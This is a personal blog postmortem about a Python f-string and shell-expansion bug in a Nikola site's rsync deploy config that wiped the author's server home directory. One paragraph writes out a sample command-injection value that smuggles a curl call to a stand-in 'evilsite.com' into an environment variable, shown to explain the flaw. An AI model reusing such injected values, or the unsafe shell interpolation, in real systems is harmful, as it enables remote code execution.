Dissecting an Interesting Failure and complete multiday outage of derekriemer.com, a postmortem investigation

What happened?

On January 3rd, 2023, I made a routine change to derekriemer.com, changing some draft changes to a new article I had written. The changes were then attempted to deploy to staging.derekriemer.com, but unknown to me, several days earlier I accidentally destroyed the entire site with a big oopsie. A combination of code as config, shell variable expansion acting in strange ways, and python F-strings ended up being the cause of the outage. The outage would have been isolated to my staging environment, but a push process that does not properly isolate the staging environment of derekriemer.com from the production environment caused the blast radius to include the entire site, including my production domain, instead of just my staging subdomain. The outage was not detected for days because I left a migration intending to provide separate draft deployment configs for staging and production in an borked state, not realizing what I had done. The fact that derekriemer.com is not particularly important meant I had left myself with no monitoring of the sites actual status, and nobody emailed me wondering where my site went, so in effect, I let my site cease to exist for over a week (I don't have records of exactly the date of the failure, because I'm lazy with my VCS for derekriemer.com, because its simply not that important).

quick overview of how derekriemer.com is set up

Derekriemer.com has two instances:

  • prod: A production instance living at derekriemer.com.
  • staging: A staging instance living at staging.derekriemer.com.

The site is powered by the Nikola static site generator. A bunch of markdown resources are processed by the Nikola engine, and injected into jinja2 templates and combined with the CSS theme to generate the actual site. A configuration file, in Python, is used by Nikola to set various settings for the site, like the tagline, translations (not applicable here), timezone, post and page settings, menus, etc. Historically I didn't have separate configs for staging and prod, which was annoying. I wished to allow prod to not allow the viewing of draft articles, but I wished staging to contain unpublished draft articles, not in listings but available for people who I whished to review. The next session will explain how a seemingly innocuous python config change, which grabbed environment variables and configured the staging and prod environment differently caused verry nasty behavior, and ultimately the destruction of the site, and severe corruption of the server, with a simple rsync push.

How the bad environment configuration worked

on my local machine, I have a wrapper script around Nikola that sets the environment, then builds, deploys, etc. the site. The config saves the environment variable for production mode in a variable in the python script called ENVIRON. The config then used a bad combination of f-string substitution to determine which directory on my server to write to. I typically, as of this outage, was writing typescript on a regular basis. Therefore, it slipped my mind that F-strings were not like javascript enhanced formatted strings. Take the below javascript code.

const TEMPLATE = `rsync output user@derekriemer.com:${ENVIRON} --delete`

The python .equivalent would be

TEMPLATE = F"rsync output user@derekriemer.com:{ENVIRON} --delete"

Instead, I wrote the following

TEMPLATE = F"rsync output user@derekriemer.com:${ENVIRON} --delete"

The devil is in the details here. The $ in python is literal. That isn't part of any sort of escape, so the result ended up being that the $ENVIRON environment variable was part of the output. Under normal circumstances, that wouldn't be a big deal, because shell substitution wouldn't apply for subprocess.call, popen, etc. Nikola, however, uses shell=true on subprocess.popen and thus $ENVIRON was interpreted. This also introduced a subtle security vulnerability. If an attacker put ; curl evilsite.com/attack.html > output/attack.html; # in $ENVIRON somehow, they could arrange to get my site to upload evilsite.com's evil.html next time I synced. or, they could use an injection attack to do anything they wanted to my machine. rsync output derek@derekriemer.com:;curl evilsite.com/output.html, output/evil.html;#fail This, however doesn't really matter, because if someone has access to my local machine, and the necessary key material and authentication methods necessary to have my ssh keys, I have bigger problems than some weirdo setting environment variables, instead of simply pwning all the things or having my server for whatever material they want to post. It's one of those "security vulnerabilities" that a person who really hasn't analyzed the risks before would freak out about, but anyone with industry experience would realize has very limited scope in this case. Of course, given that I found an injection attack in my code, I fixed it and thought about the steps that let me cause it to happen to begin with, but I didn't lose sleep over it. It's interesting nevertheless.

How the server is laid out

staging is simply a subdomain of prod. The server has a (not to be named for security purposes) user account, protected by an ssh keypair, that stores the html assets. Separate nginx configs have roots pointing to derekriemer.com's files for prod, and staging.derekriemer.com's files for staging. The roots point to directories with the proper world-readable permissions, but the parent directory (and home of the user) does not allow reading the data stored there, and the config expressly forbids url "." prefixed other than .well-nown. So, we have the following user account, with "love" as the user, because that's the random word I picked:

/home/love
  /
    prod
      ...
      index.html
    staging
      ...
      index.html

With prod and staging both living in the same user account, what happens if somehow, files aren't written to /staging, but to the parent, /home/love? it'll write the contents of my website to /home/love, and since I had --delete in the options for rsync, it would delete every file that wasn't being synced (necessary because when I delete a page, or undeploy a post, I need that post to go bye bye).

How I discovered the issue

On janruary 3rd, I attempted to push a change to an upcoming post and updates to the copyright year to the site. I ran ./nikola_runner.sh build then I ran ./nikola_runner.sh deploy which would deploy to staging. There was a bug in my script though. Since the variable $ENVIRON was not set, because the environment variable I use for this script is called DEPLOYMENT_MODE the output command substituted nothing for $ENVIRON, even though ENVIRON is properly set in python. Therefore, rsync --delete output love@derekriemer.com: was ran. Oops! Guess what is under the user account? Oh yeah duh, .ssh! The way I found this was logging into the server under another ssh account, and running a listing on that directory. Of course, when I saw the contents of my site and nothing more I was like wo!

Why I was surprised

I've intentionally set my site up as a static site for a couple of reasons.

  • I don't need a cms, I find most annoying for code publishing, etc, and all of them have accessibility annoyances that my text editor has solved years ago. I'm not fighting with a cms when I can just write markdown.
  • Maintaining a database on my server necessitates taking extra security risks. Since the entirety of my site is static, by design, these extra security risks in having a CMS that uses a database are simply unecessary. Databases are complex pieces of technology, and the code that interacts with them are commonly part of security vulnerabilities. If I, or a hosting company of my choosing, messes the configuration or protection of the database up, the database can be poisoned by attackers to do whatever the attacker wants. For example, wordpress, while extremely well maintained, sometimes has security vulnerabilities discovered, and plugins are nutorious for them. Any CMS like wordpress, that has enough users, will be the target of attacks within hours, not days. I simply don't want to have to take on the responsibility to update a system that fast or risk attacks. My static content, on the other hand, is simply a bunch of standard files, protected by standard filesystem primitives, and handled by an extremely simple server config. I can, in the event of a d-dos attack, or server outage, give HTML and CSS assets to someone like cloudflare and be online without any mucking around.
  • Most cms systems, by querying a database, are lower performance than simple html assets. My website, by being static html, most of which rarely changes, is incredibly quick to load, doesn't hydrate anything with javascript after load, doesn't need unnecessary javascript or database queries, etc. By being static HTML, my site can be cached with ease, so users who visit my site, then click around can often receive many of the resources without even touching the network. I'm not adding complexity by using a CMS, frontend framework, etc, when I can compile everything up front to be literally stock boring HTML. Boring is good sometimes. Many web developers need to learn to stop overengineering things. I'm always maddened when common sites load several megabytes of plutonium infested garbage, only to load a simple article or similar.
  • Given that most CMS systems have accessibility annoyances and performance considderations, why bother maintaining and dealing with one when it's more performant, more secure, and less hassle for me to just use a static site generator?

Given how I've taken great lengths to make my content as simple to maintain and deal with as possible, I was surprised by how a simple config change I made ended up blowing everything away. I mostly reiterated lessons I've learned over the past few years, config is just as dangerous as code when configuring a system, especially if that config is either interpreted, or actual code.